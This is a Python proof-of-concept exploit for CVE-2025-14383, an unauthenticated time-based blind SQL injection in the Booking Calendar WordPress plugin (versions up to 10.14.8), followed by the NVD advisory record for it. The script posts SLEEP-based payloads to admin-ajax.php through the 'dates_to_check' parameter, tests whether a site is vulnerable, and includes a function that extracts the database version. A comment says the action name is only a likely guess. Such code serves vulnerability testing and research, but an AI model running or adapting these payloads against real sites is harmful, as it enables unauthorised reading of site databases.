CVE-2025-14383

# CVE-2025-14383 Time-based Blind SQL Injection PoC # Affected: Booking Calendar WordPress Plugin <= 10.14.8 # Vector: 'dates_to_check' parameter import requests import time import sys TARGET_URL = "http://target-wordpress-site/wp-admin/admin-ajax.php" def test_sqli_vulnerability(): """Test if the target is vulnerable to CVE-2025-14383""" # Basic test payload - if vulnerable, response will be delayed by ~5 seconds payload = "1' AND (SELECT SLEEP(5)) AND '1'='1" data = { 'action': 'booking_capacity_check', # Likely action name 'dates_to_check': payload } print(f"[*] Testing CVE-2025-14383 on {TARGET_URL}") print(f"[*] Payload: {payload}") start_time = time.time() try: response = requests.post(TARGET_URL, data=data, timeout=30) elapsed = time.time() - start_time if elapsed >= 4.5: # If delayed by ~5 seconds, likely vulnerable print(f"[+] VULNERABLE! Response delayed by {elapsed:.2f} seconds") return True else: print(f"[-] Not vulnerable or target not found") return False except requests.exceptions.Timeout: print("[+] VULNERABLE! Request timed out (expected behavior)") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_data_via_blind_sqli(): """Extract database version using time-based blind SQL injection""" # Extract MySQL version using time-based technique payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1" data = { 'action': 'booking_capacity_check', 'dates_to_check': payload } start_time = time.time() requests.post(TARGET_URL, data=data, timeout=30) elapsed = time.time() - start_time if elapsed >= 4.5: print("[+] MySQL Version starts with '5'") else: print("[-] MySQL Version does not start with '5'") if __name__ == "__main__": test_sqli_vulnerability()

{"cve": {"id": "CVE-2025-14383", "sourceIdentifier": "[email protected]", "published": "2025-12-15T15:15:49.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Calendar plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'dates_to_check' parameter in all versions up to, and including, 10.14.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3416518/booking/trunk/includes/_capacity/capacity.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/790f93b0-eb69-473f-a726-bfe215f5d870?source=cve", "source": "[email protected]"}]}}